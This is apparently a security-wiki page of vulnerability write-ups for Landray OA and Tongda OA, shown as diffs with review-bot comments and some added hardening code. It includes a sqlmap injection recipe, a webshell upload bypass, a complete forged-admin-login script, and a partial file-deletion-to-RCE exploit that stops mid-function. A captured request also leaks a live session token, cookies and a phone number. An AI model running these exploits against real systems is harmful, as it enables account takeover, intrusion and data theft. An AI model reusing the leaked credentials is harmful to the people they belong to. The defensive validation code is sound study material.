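Review bot: `POC_1()` prints a result only when `root:` is found; a target that answers 200 without the file, or a Windows host where `/etc/passwd` does not exist, produces no output at all. Add an else branch, and consider a second probe such as `/WEB-INF/KmssConfig/admin.properties`, the path the admin.do entry uses, which exists on every deployment. Since the JSP passes `body.file` straight into `<c:import url=...>`, the same attribute accepts `http://` URLs, so the description should say this is a server-side request primitive and not only a local file read. `base64`, `random`, `re` and `json` are imported but unused, and `verify=False` without `urllib3.disable_warnings()` will fill the output with warnings.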

View File

@ -0,0 +1,59 @@
# 蓝凌OA kmImeetingRes.do 后台SQL注入漏洞 CNVD-2021-01363
## 漏洞描述
深圳市蓝凌软件股份有限公司数字OA(EKP)存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。
## 漏洞影响
```
蓝凌OA
```
## FOFA
```
app="Landray-OA系统"
```
## 漏洞复现
存在SQL注入的 Url为,这里拿官方的演示站点演示漏洞过程
```plain
https://xxx.xxx.xxx.xxx/km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true
```
其中存在SQL注入的参数为 **ordeby** 数据包如下
```sql
GET /km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true HTTP/1.1
Host: xxx.xxx.xxx.xxx
Connection: close
Pragma: no-cache
Cache-Control: no-cache
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: UM_distinctid=1785f7392888e1-02ece8c7e9a996-5771031-1fa400-1785f73928943d; landray_danyuan=null; landray_guanjianci=null; landray_sorce=baidupinzhuanwy; landray_jihua=null; JSESSIONID=232B6933CF33B5422F9D2649739D48FE; Hm_lvt_223eecc93377a093d4111a2d7ea28f51=1616509114,1616566341,1616566350; Hm_lpvt_223eecc93377a093d4111a2d7ea28f51=1616566350; Hm_lvt_d14cb406f01f8101884d7cf81981d8bb=1616509114,1616566341,1616566350; Hm_lpvt_d14cb406f01f8101884d7cf81981d8bb=1616566507; Hm_lvt_95f4f43e7aa1fe68a51c44ae4eed925d=1616509872,1616509969,1616509973,1616566507; Hm_lpvt_95f4f43e7aa1fe68a51c44ae4eed925d=1616566507; Hm_lvt_22f1fea4412727d23e6a998a4b46f2ab=1616509872,1616509969,1616509973,1616566507; Hm_lpvt_22f1fea4412727d23e6a998a4b46f2ab=1616566507; fd_name=%E5%95%8A%E7%9A%84%E5%93%88; fd_id=1785f817dd0f5a4beaa482646cb9a2d8; nc_phone=15572002383; j_lang=zh-CN; LtpaToken=AAECAzYwNUFEOEZBNjA1QjgxQkFsdW9stJ5e1pcW1hgQi3cOa0iEyAhdZZs=; Hm_lvt_95cec2a2f107db33ad817ed8e4a3073b=1616510026,1616566523; Hm_lpvt_95cec2a2f107db33ad817ed8e4a3073b=1616566523; add_customer=0
```
保存为文件,使用 Sqlmap 跑一下注入
```plain
sqlmap -r sql.txt -p orderby --dbs
```
![7028e5e6-5d0f-44f9-a3e0-044636024b0c](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090127479.png)
## 感谢名单
感谢 @Miaòa 师傅的投稿
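Review bot: the `Cookie` header in the captured request contains a live `LtpaToken`, a `JSESSIONID`, `fd_id`, `fd_name` and a phone number (`nc_phone=...`) from the vendor's demo site; that is credential and personal-data leakage on a public page and must be scrubbed, all the more because the injection is 后台 (authenticated) and `sqlmap -r sql.txt` replays the whole header. `ordeby` in the prose is a typo for `orderby`, the parameter the request and the sqlmap line actually use, and the request fence is tagged `sql` although it holds an HTTP request.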

View File

@ -0,0 +1,49 @@
# 通达OA v11.2 upload.php 后台任意文件上传漏洞
## 漏洞描述
通达OA v11.2后台存在文件上传漏洞,允许通过绕过黑名单的方法来上传恶意文件,导致服务器被攻击
## 影响版本
```
通达OA v11.2
```
## Environment setup
[通达OA v11.2 download link](https://cdndown.tongda2000.com/oa/2019/TDOA11.2.exe)
Download it and follow the installer steps.
## Reproduction
The vulnerability is in the back end, so it can only be used after logging in.
After logging in, click **菜单 -> 系统管理 -> 附件管理** (Menu -> System Management -> Attachment Management)
![image-20220209105402262](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091054355.png)
Click to add an attachment storage entry as shown below (the storage directory is the webroot directory, by default **D:/MYOA/webroot/**)
![image-20220209105417083](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091054194.png)
Click **组织 -> 系统管理员 -> 上传附件** (Organization -> System Administrator -> Upload Attachment)
![image-20220209105436655](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091054718.png)
Intercept the request and use the Windows bypass **shell.php -> shell.php.** (a trailing dot, which the Windows file system discards when the file is written)
![image-20220209105510484](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091055562.png)
2012 is the directory
1717872192 is the prefix concatenated to the file name
so the final shell file name is 1717872192.shell.php
![image-20220209105530593](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091055671.png)
Access the uploaded shell file
![image-20220209105545405](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091055475.png)
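The bypass above works because the blacklist inspects the literal file name while Windows stores `shell.php.` as `shell.php`. The following is an added example (not code from the 通达OA product or from this wiki) of an upload check that evaluates the name the operating system will actually store and uses an extension allowlist; the allowed and blacklisted extension sets and the `<prefix>.<name>` storage layout are assumptions modelled on this page.

```python
import os
import re
import unicodedata
from typing import Optional

# Extensions this upload endpoint is meant to accept (assumption for the example;
# a deployment would tune it to the attachment types it really needs).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "doc", "docx",
                      "xls", "xlsx", "txt", "zip"}

# The kind of list a blacklist check carries (assumption; the product's real list is not on the page).
BLACKLISTED_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "jsp", "asp", "aspx"}


def blacklist_check(filename: str) -> bool:
    """The check the trailing-dot trick defeats: it looks only at the literal last
    extension, so 'shell.php.' has the extension '' and is accepted."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in BLACKLISTED_EXTENSIONS


def normalize_windows_name(filename: str) -> str:
    """Apply what the Windows file system does to a name before storing it:
    trailing dots and spaces are discarded, so 'shell.php.' becomes 'shell.php'."""
    return filename.rstrip(". ")


def hardened_check(filename: str) -> bool:
    """Allowlist check run on the normalized name, not on the name as submitted."""
    name = os.path.basename(filename.replace("\\", "/"))   # drop any path component
    name = unicodedata.normalize("NFKC", normalize_windows_name(name))
    if not name or name.startswith("."):
        return False                                       # empty or dotfile
    # exactly one extension made of safe characters: rejects 'a.php.jpg' and odd bytes
    if not re.fullmatch(r"[A-Za-z0-9_\-]+\.[A-Za-z0-9]+", name):
        return False
    return name.rsplit(".", 1)[1].lower() in ALLOWED_EXTENSIONS


def store_name(prefix: str, filename: str) -> Optional[str]:
    """Mirror the page's '<prefix>.<name>' layout, but only for names that pass."""
    if not hardened_check(filename):
        return None
    return f"{prefix}.{normalize_windows_name(os.path.basename(filename))}"
```

`blacklist_check("shell.php.")` returns True (the bypass), while `hardened_check("shell.php.")` returns False because the name is normalized before the extension is examined; a legitimate `photo.png` is stored as `1717872192.photo.png`.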


@ -0,0 +1,174 @@
# 通达OA v11.5 login_code.php arbitrary user login
## Vulnerability description
通达OA is an office automation system. On 17 April 2020 the vendor released a security patch for v11 that fixed an arbitrary user impersonation (forged login) vulnerability.
The flaw is a user impersonation issue: an unauthenticated remote attacker can send crafted requests to log in as any user.
## Affected versions
```
通达OA 2017版
通达OA版本 V11.X < V11.5
```
## Environment setup
Download the vulnerable environment:
```plain
https://cdndown.tongda2000.com/oa/2019/TDOA11.4.exe
```
Double-click to install.
![image-20220209105714403](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091057824.png)
## Reproduction
Use the [POC](https://github.com/NS-Sp4ce/TongDaOA-Fake-User/blob/master/POC.py) to obtain the administrator's cookie:
```plain
root@kali:~/桌面# python3 1.py -v 11 -u http://xx.xxx.xxx.xxx
[+]Get Available COOKIE:PHPSESSID=sr3f46qg6539khd3e3rrucoa72; path=/
```
With the cookie obtained, add it to the request and visit [**http://xxx.xxx.xxx.xxx/general/index.php?isIE=0&modify_pwd=0**](http://xxx.xxx.xxx.xxx/general/index.php?isIE=0&modify_pwd=0).
![image-20220209105731535](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091057599.png)
## Vulnerability POC
```python
'''
@Author : Sp4ce
@Date : 2020-03-17 23:42:16
LastEditors : Sp4ce
LastEditTime : 2020-08-27 10:21:44
@Description : Challenge Everything.
'''
import requests
from random import choice
import argparse
import json

USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
    "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
headers = {}


def getV11Session(url):
    checkUrl = url+'/general/login_code.php'
    try:
        headers["User-Agent"] = choice(USER_AGENTS)
        res = requests.get(checkUrl, headers=headers)
        resText = str(res.text).split('{')
        codeUid = resText[-1].replace('}"}', '').replace('\r\n', '')
        getSessUrl = url+'/logincheck_code.php'
        res = requests.post(
            getSessUrl, data={'CODEUID': '{'+codeUid+'}', 'UID': int(1)}, headers=headers)
        tmp_cookie = res.headers['Set-Cookie']
        headers["User-Agent"] = choice(USER_AGENTS)
        headers["Cookie"] = tmp_cookie
        check_available = requests.get(url + '/general/index.php', headers=headers)
        if '用户未登录' not in check_available.text:
            if '重新登录' not in check_available.text:
                print('[+]Get Available COOKIE:' + tmp_cookie)
        else:
            print('[-]Something Wrong With ' + url + ',Maybe Not Vulnerable.')
    except:
        print('[-]Something Wrong With '+url)


def get2017Session(url):
    checkUrl = url+'/ispirit/login_code.php'
    try:
        headers["User-Agent"] = choice(USER_AGENTS)
        res = requests.get(checkUrl, headers=headers)
        resText = json.loads(res.text)
        codeUid = resText['codeuid']
        codeScanUrl = url+'/general/login_code_scan.php'
        res = requests.post(codeScanUrl, data={'codeuid': codeUid, 'uid': int(
            1), 'source': 'pc', 'type': 'confirm', 'username': 'admin'}, headers=headers)
        resText = json.loads(res.text)
        status = resText['status']
        if status == str(1):
            getCodeUidUrl = url+'/ispirit/login_code_check.php?codeuid='+codeUid
            res = requests.get(getCodeUidUrl)
            tmp_cookie = res.headers['Set-Cookie']
            headers["User-Agent"] = choice(USER_AGENTS)
            headers["Cookie"] = tmp_cookie
            check_available = requests.get(url + '/general/index.php', headers=headers)
            if '用户未登录' not in check_available.text:
                if '重新登录' not in check_available.text:
                    print('[+]Get Available COOKIE:' + tmp_cookie)
            else:
                print('[-]Something Wrong With ' + url + ',Maybe Not Vulnerable.')
        else:
            print('[-]Something Wrong With '+url + ' Maybe Not Vulnerable ?')
    except:
        print('[-]Something Wrong With '+url)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-v",
        "--tdoaversion",
        type=int,
        choices=[11, 2017],
        help="Target TongDa OA Version. e.g: -v 11、-v 2017")
    parser.add_argument(
        "-url",
        "--targeturl",
        type=str,
        help="Target URL. e.g: -url 192.168.2.1、-url http://192.168.2.1"
    )
    args = parser.parse_args()
    url = args.targeturl
    if 'http://' not in url:
        url = 'http://' + url
    if args.tdoaversion == 11:
        getV11Session(url)
    elif args.tdoaversion == 2017:
        get2017Session(url)
    else:
        parser.print_help()
```


@ -0,0 +1,392 @@
# 通达OA v11.6 print.php arbitrary file deletion & RCE
## Vulnerability description
The arbitrary file deletion is used to remove the authentication include that the upload endpoint depends on, which turns the upload into an unauthenticated arbitrary file upload.
## Affected products
```
通达OA v11.6
```
## Environment setup
[通达OA v11.6 download link](https://cdndown.tongda2000.com/oa/2019/TDOA11.6.exe)
After downloading, click to install.
## Reproduction
Use the SeayDzend decryption tool (a Zend decoder) to decrypt 通达OA's encoded source.
The decryption tool has been placed in the POC directory of this folder.
After decryption, look at the **webroot\general\data_center\utils\upload.php** file:
```php
<?php
include_once "inc/auth.inc.php";
include_once "./utils.func.php";
$HTML_PAGE_TITLE = _("上传文件");
include_once "inc/header.inc.php";
$error = "";
$msg = "";
if ($action == "upload") {
    if ($filetype == "xls") {
        $uploaddir = MYOA_ATTACH_PATH . "/data_center/templates/";
        if (!is_dir(MYOA_ATTACH_PATH . "/data_center/templates")) {
            if (!is_dir(MYOA_ATTACH_PATH . "/data_center")) {
                mkdir(MYOA_ATTACH_PATH . "/data_center");
            }
            mkdir(MYOA_ATTACH_PATH . "/data_center/templates");
        }
        if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $_FILES["FILE1"]["name"])) {
        }
    }
    else if ($filetype == "img") {
        $uploaddir = MYOA_ATTACH_PATH . "/data_center/images/";
        if (!is_dir(MYOA_ATTACH_PATH . "/data_center/images")) {
            if (!is_dir(MYOA_ATTACH_PATH . "/data_center")) {
                mkdir(MYOA_ATTACH_PATH . "/data_center");
            }
            mkdir(MYOA_ATTACH_PATH . "/data_center/images");
        }
        $s_n = $_FILES["FILE1"]["name"];
        if ($s_n[0] != "{") {
            $p = strrpos($s_n, ".");
            $s_n = CreateId() . substr($s_n, $p);
        }
        if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $s_n)) {
        }
    }
    else {
        $uploaddir = MYOA_ATTACH_PATH . "/data_center/attachment/";
        if (!is_dir(MYOA_ATTACH_PATH . "/data_center/attachment")) {
            if (!is_dir(MYOA_ATTACH_PATH . "/data_center")) {
                mkdir(MYOA_ATTACH_PATH . "/data_center");
            }
            mkdir(MYOA_ATTACH_PATH . "/data_center/attachment");
        }
        if (isset($from_rep)) {
            if (($from_rep != "") && ($from_rep[0] == "{")) {
                $repkid = GetRepKIDBySendId($from_rep);
                if ($repkid != $to_rep) {
                    if (file_exists($uploaddir . "/" . $repkid . "_" . $filename)) {
                        copy($uploaddir . "/" . $repkid . "_" . $filename, $uploaddir . "/" . $to_rep . "_" . $filename);
                    }
                }
            }
            else {
                $arr = explode(",", $from_rep);
                for ($i = 0; $i < count($arr); $i++) {
                    $p = strpos($arr[$i], ".");
                    $repno = substr($arr[$i], 0, $p);
                    $repkid = GetRepKIDByNo($repno);
                    if ($repkid != $to_rep) {
                        if (file_exists($uploaddir . "/" . $repkid . "_" . $filename)) {
                            copy($uploaddir . "/" . $repkid . "_" . $filename, $uploaddir . "/" . $to_rep . "_" . $filename);
                            break;
                        }
                    }
                }
            }
        }
        else {
            $s_n = $_FILES["FILE1"]["name"];
            if ($s_n[0] != "{") {
                $s_n = $repkid . "_" . $s_n;
            }
            if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $s_n)) {
            }
        }
    }
    @unlink($_FILES["FILE1"]);
}
else if ($action == "unupload") {
    if ($filetype == "xls") {
        $uploaddir = MYOA_ATTACH_PATH . "data_center/attachment/" . trim($filename) . ".xls";
        if (is_file($uploaddir)) {
            unlink($uploaddir);
        }
    }
    else if ($filetype == "img") {
        $uploaddir = MYOA_ATTACH_PATH . "data_center/images/" . trim($filename);
        if (is_file($uploaddir)) {
            unlink($uploaddir);
        }
    }
    else if ($filetype == "attach") {
        $uploaddir = MYOA_ATTACH_PATH . "data_center/attachment/" . trim($filename);
        if (is_file($uploaddir)) {
            unlink($uploaddir);
        }
    }
}
echo "{";
echo "new_name:'$s_n',\n";
echo "error: '" . $error . "',\n";
echo "msg: '" . $msg . "'\n";
echo "}";
echo "<body>\r\n</body>\r\n</html>";
?>
```
The first line includes the **auth.inc.php** file:
```php
include_once "inc/auth.inc.php";
```
![image-20220209105907490](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091059689.png)
This file checks whether the user is logged in, so the vulnerability cannot be used without a login.
Look at the **\webroot\module\appbuilder\assets\print.php** file:
![image-20220209105939041](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091059191.png)
```php
<?php
$s_tmp = __DIR__ . "/../../../../logs/appbuilder/logs";
$s_tmp .= "/" . $_GET["guid"];
if (file_exists($s_tmp)) {
    $arr_data = unserialize(file_get_contents($s_tmp));
    unlink($s_tmp);
    $s_user = $arr_data["user"];
}
else {
    echo "未知参数";
    exit();
}
```
Here the page takes the value of the guid parameter and appends it to the log directory path.
**file_exists** is only used to check that the file exists; with no further validation of the path, unlink is called to delete it.
Locally, create a 1.txt file in the **\webroot\inc** directory,
then visit [**http://xxx.xxx.xxx.xxx/module/appbuilder/assets/print.php?guid=../../../webroot/inc/1.txt**](http://xxx.xxx.xxx.xxx/module/appbuilder/assets/print.php?guid=../../../webroot/inc/1.txt): the 1.txt file is deleted, which means the **auth.inc.php** login check file can be deleted the same way.
Back to upload.php for code review:
![](../../images/e4502bc6-6698-49d6-8984-46c3f195264e.png)
It checks whether **$action** is upload and then the file type; if it is neither xls nor img, execution enters the else branch:
```php
else {
    $uploaddir = MYOA_ATTACH_PATH . "/data_center/attachment/";
    if (!is_dir(MYOA_ATTACH_PATH . "/data_center/attachment")) {
        if (!is_dir(MYOA_ATTACH_PATH . "/data_center")) {
            mkdir(MYOA_ATTACH_PATH . "/data_center");
        }
        mkdir(MYOA_ATTACH_PATH . "/data_center/attachment");
    }
    if (isset($from_rep)) {
        if (($from_rep != "") && ($from_rep[0] == "{")) {
            $repkid = GetRepKIDBySendId($from_rep);
            if ($repkid != $to_rep) {
                if (file_exists($uploaddir . "/" . $repkid . "_" . $filename)) {
                    copy($uploaddir . "/" . $repkid . "_" . $filename, $uploaddir . "/" . $to_rep . "_" . $filename);
                }
            }
        }
        else {
            $arr = explode(",", $from_rep);
            for ($i = 0; $i < count($arr); $i++) {
                $p = strpos($arr[$i], ".");
                $repno = substr($arr[$i], 0, $p);
                $repkid = GetRepKIDByNo($repno);
                if ($repkid != $to_rep) {
                    if (file_exists($uploaddir . "/" . $repkid . "_" . $filename)) {
                        copy($uploaddir . "/" . $repkid . "_" . $filename, $uploaddir . "/" . $to_rep . "_" . $filename);
                        break;
                    }
                }
            }
        }
    }
    else {
        $s_n = $_FILES["FILE1"]["name"];
        if ($s_n[0] != "{") {
            $s_n = $repkid . "_" . $s_n;
        }
        if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $s_n)) {
        }
    }
}
@unlink($_FILES["FILE1"]);
}
```
In this code, if the **$from_rep** variable is not set, execution falls through to the following:
```php
else {
    $s_n = $_FILES["FILE1"]["name"];
    if ($s_n[0] != "{") {
        $s_n = $repkid . "_" . $s_n;
    }
    if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $s_n)) {
    }
}
```
Here **$repkid** is concatenated directly into the destination path, so directory traversal can be used to upload a malicious file into a chosen directory.
Escaping the attachment directory relies on a flaw in how file_exists handles the path: the sequence /.<>./.<>./.<>./ is constructed to break out.
Use the POC to exploit the vulnerability:
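Both print.php (the `guid` parameter joined to the log directory and passed to unlink) and the upload branch above (`$repkid` joined to the attachment directory) have the same root cause: a request value becomes part of a filesystem path without being validated or canonicalised. The following is an added example (not code from 通达OA or from this wiki) of the two checks a fix needs, written in Python: an identifier allowlist applied before any filesystem call, and a canonical-path containment check. The GUID format and the temporary directory layout used by `demo()` are assumptions; the product's real id format is not on the page.

```python
import os
import re
import tempfile
from typing import Optional

# Shape of the identifiers these endpoints expect (assumption for the example:
# a brace-wrapped GUID). Anything else is rejected before the filesystem is touched,
# so oddities such as the /.<>./ sequence never reach file_exists/unlink at all.
GUID_RE = re.compile(r"^\{?[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}?$")


def is_valid_identifier(value: str) -> bool:
    return bool(GUID_RE.match(value))


def resolve_within(base_dir: str, untrusted: str) -> Optional[str]:
    """Join `untrusted` to `base_dir` and return the canonical path only if it is
    still inside base_dir. realpath() resolves '..' and symlinks before the
    comparison, so traversal cannot escape; non-existent names resolve too."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, untrusted))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def safe_delete_log(logs_dir: str, guid: str) -> bool:
    """Hardened form of print.php's 'look up the guid file and unlink it' step."""
    if not is_valid_identifier(guid):
        return False
    path = resolve_within(logs_dir, guid)
    if path is None or not os.path.isfile(path):
        return False
    os.unlink(path)
    return True


def safe_upload_target(attachment_dir: str, repkid: str, filename: str) -> Optional[str]:
    """Hardened form of upload.php's '$repkid . "_" . $s_n' destination."""
    if not is_valid_identifier(repkid):
        return None
    name = os.path.basename(filename.replace("\\", "/"))      # drop client-supplied path parts
    if name.startswith(".") or not re.fullmatch(r"[A-Za-z0-9_.\-]+", name):
        return None
    return resolve_within(attachment_dir, f"{repkid}_{name}")


def demo() -> dict:
    """Exercise the checks on a throwaway directory tree mirroring the page's layout."""
    root = tempfile.mkdtemp()
    logs = os.path.join(root, "logs", "appbuilder", "logs")
    inc = os.path.join(root, "webroot", "inc")
    os.makedirs(logs)
    os.makedirs(inc)
    auth_file = os.path.join(inc, "auth.inc.php")            # the file the page deletes
    open(auth_file, "w").close()
    good_id = "{1B4E28BA-2FA1-11D2-883F-0016D3CCA427}"        # constructed GUID
    good_file = os.path.join(logs, good_id)
    open(good_file, "w").close()
    return {
        "traversal_rejected": (safe_delete_log(logs, "../../../webroot/inc/auth.inc.php") is False
                               and os.path.exists(auth_file)),
        "odd_sequence_rejected": safe_upload_target(root, "/.<>./.<>./.<>./", "test.php") is None,
        "valid_guid_deleted": (safe_delete_log(logs, good_id) is True
                               and not os.path.exists(good_file)),
        "upload_stays_inside": safe_upload_target(root, good_id, "report.xls")
                               == os.path.join(os.path.realpath(root), f"{good_id}_report.xls"),
    }
```

The order matters: the allowlist runs first so that the filesystem never sees a malformed name, and the containment check is computed on the canonical path rather than on the string, which is why `../` and symlink tricks fail even if a future id format had to admit more characters.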
![image-20220209110025711](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091100958.png)
Note that after the authentication file is deleted the back-end pages break as shown below, so back the file up before use.
![image-20220209110050983](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091100063.png)
## Vulnerability POC
```python
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech
import requests
import re
import base64
import sys


def title():
    print('+------------------------------------------')
    print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
    print('+ \033[34mVersion: 通达OA v11.6 任意文件删除&RCE \033[0m')
    print('+ \033[36m使用格式: python3 poc.py \033[0m')
    print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
    print('+ \033[36mCmd >>> whoami \033[0m')
    print('+------------------------------------------')


def POC_1(target_url):
    check_url = target_url + "/module/appbuilder/assets/print.php"
    try:
        check_url_response = requests.get(url = check_url)
        if check_url_response.status_code == 200:
            print("\033[32m[o] 存在 /module/appbuilder/assets/print.php 可能含有通达OA v11.6 任意文件删除&RCE漏洞\033[0m")
            input("\033[32m[o] 此漏洞会对真实环境造成影响,请在授权的情况下利用此漏洞,按下任意键继续..... \033[0m")
        else:
            print("\033[31m[x] 不存在 /module/appbuilder/assets/print.php 漏洞利用失败 \033[0m")
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 请求失败,{} \033[0m".format(e))
        sys.exit(0)


def POC_2(target_url):
    unlink_url = target_url + "/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
    try:
        unlink_response = requests.get(url = unlink_url)
        if unlink_response.status_code == 200:
            print("\033[32m[o] 成功删除校验文件 auth.inc.php \033[0m")
        else:
            print("\033[31m[x] 删除校验文件 auth.inc.php 失败 \033[0m")
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 请求失败,{} \033[0m".format(e))
        sys.exit(0)


def POC_3(target_url, payload_php):
    """
